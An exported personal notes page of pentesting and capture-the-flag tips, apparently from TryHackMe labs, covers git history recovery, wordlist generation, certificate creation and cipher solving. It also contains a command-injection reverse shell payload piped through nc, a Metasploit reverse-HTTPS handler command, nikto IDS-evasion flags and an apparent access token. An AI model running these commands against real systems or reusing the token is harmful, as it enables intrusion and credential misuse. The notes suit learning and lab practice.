<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../style.css">
    <base target="_parent">
    <title data-trilium-title>Miscellaneous</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Miscellaneous</h1>

      <div class="ck-content">
        <p>always click around and make sure you check ALL of the functionality of
          a website or a service for that matter.</p>
        <p>use <code>git log</code> to see previous commits, <code>git show &lt;commit&gt;</code> to
          see the edited contents and <code>git checkout &lt;commit&gt;</code> to see
          the files(Very important) or <code>git reset --hard &lt;commit&gt;</code> to
          restore files.</p>
        <p><code>dnsrecon</code> is a good idea when checking for certificates and
          domain names.</p>
        <p>You should ALWAYS try using the app as a user if you have the chance to.
          Learning how it functions will let you figure out how to manipulate it.</p>
        <p>to get only uniqe letters(no copies) use the following:</p><pre><code class="language-text-plain">crunch 6 6 -p oqfxvg &gt; wordlist2.txt</code></pre><pre><code class="language-text-plain">apt list --upgradeable</code></pre>

        <p><code>openssl req -x509 -newkey rsa:4096 -days 365 -subj '/CN=www.redteam.thm/O=Red Team THM/C=UK' -nodes -keyout thm-reverse.key -out thm-reverse.crt</code>

        </p><pre><code class="language-text-plain">msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost AttackBox_IP;set lport 4443;exploit"</code></pre>

        <p>The arguments in the above command are:</p>
        <ul>
          <li><code>req</code> indicates that this is a certificate signing request.
            Obviously, we won’t submit our certificate for signing.</li>
          <li><code>-x509</code> specifies that we want an X.509 certificate</li>
          <li><code>-newkey rsa:4096</code> creates a new certificate request and a new
            private key using RSA, with the key size being 4096 bits. (You can use
            other options for RSA key size, such as <code>-newkey rsa:2048</code>.)</li>
          <li><code>-days 365</code> shows that the validity of our certificate will
            be one year</li>
          <li><code>-subj</code> sets data, such as organization and country, via the
            command-line.</li>
          <li><code>-nodes</code> simplifies our command and does not encrypt the private
            key</li>
          <li><code>-keyout PRIVATE_KEY</code> specifies the filename where we want to
            save our private key</li>
          <li><code>-out CERTIFICATE</code> specifies the filename to which we want to
            write the certificate request</li>
        </ul>
        <p><code>cat thm-reverse.key thm-reverse.crt &gt; thm-reverse.pem</code>

        </p>
        <p>IDS ACESS TOKEN:</p>
        <p><code>Hr8sZjlmqahSJCGp_x9lljJKNRpct_ZUqcG_sv-KeZQAJsi2cKYCBhAtBuOFMtb4QO88rfjQdJrOZ5JuMdlCakrsK0zCdwmGpDdKOaqOZOBsSgGj-aW2uaNTYL39ou764Vv0OWmvjGEkLPwYIjPEzm3R4GNWhDkesfRWkobS3-k</code>

        </p>
        <p>you can create a reverse shell wit ping by </p><pre><code class="language-text-x-csrc">Ping(ip: "; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.17.17.11 1234 &gt;/tmp/f")

\xf0\x18\xd2\xbf\x86\xd8\x82\xdc\xd6\xce\x81\xde\xf6\x14c\xd9\xda\xe9\xa2\x89\xb7\xda\xc8\x1d</code></pre>

        <p>if you hit CTRL-ALT and an FC you can see the linux terminals, <i>generally</i> linux
          distors <i>allocate</i> 1 to 7 of them, but there could be more, <i>usually</i> 1
          or 2 is your GUI, and the rest are text logins (Old distros, 7 was the
          gui); or if you run <code>systemctl isolate multi-user</code> (I think it's
          hyphenated) it'll move it back to terminal mode without a gui (and <code>systemctl isolate graphical</code> to
          get back) (<code>telinit 3</code> and <code>telinit 5</code> before systemctl
          was common)</p>
        <p>when uploading files in smb, make sure the file is in your current dir
          so that a simple <code>put &lt;file&gt;</code> works, no absolute path</p>
        <p>For uncompyling python code, use <code>uncompyle2</code> or <code>uncompyle6</code>

        </p>
        <p>we could also go further and use a selection of the IDS evasion modes
          available with <code>nikto</code> these are set with the <code>-e</code> flag:</p>
        <p><code>nikto -p3000 -T 1 2 3 -useragent &lt;AGENT_HERE&gt; -e 1 7 -h 10.10.16.6</code>

        </p>
        <p>You will notice the numbering is in the same position. So, this is either
          a vigenere cipher or a Ceaser cipher.</p>
        <p>To obtain the key, simply do a reverse key search based on the vigenere
          table. </p>
        <p>The left letter bar represents plaintext, the upper letter bar represents
          key (either one, the table is symmetrical) and the inner table is ciphertext.
          Let’s take the second letter and compare it.</p><pre><code class="language-text-plain">CBQOSTEFZNL5U8LJB2hhBTDvQi2zQo (Encrypted)
ANDVOWLDLAS5Q8OQZ2tu           (Plaintext)</code></pre><pre><code class="language-text-plain">B (Encrypt)
N (Plaintext)
O (Key)</code></pre>

        <p>
          <img src="Miscellaneous/14.png" alt="vigenere table" />
        </p>
         <h2>Git</h2>

        <p>use githack.py to get source code of files. <code>/.git/logs/HEAD</code> has
          the info on the commits and previous history, to look into a specific object,
          go to <code>/.git/objects/79/c9539b6566b06d6dec2755fdf58f5f9ec8822f</code> (after
          the first two letters of the object, there's a sub-directory). We need
          a dummy git folder locally to read the file.</p><pre><code class="language-text-plain">git init</code></pre>

        <p>create folder <code>79</code> in <code>/.git/objects/</code> and place the
          (two first character missing) file in that folder, then use </p><pre><code class="language-text-plain">git cat-file -p 79c9539b6566b06d6dec2755fdf58f5f9ec8822f</code></pre>

        <p>to cat the file</p>
        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>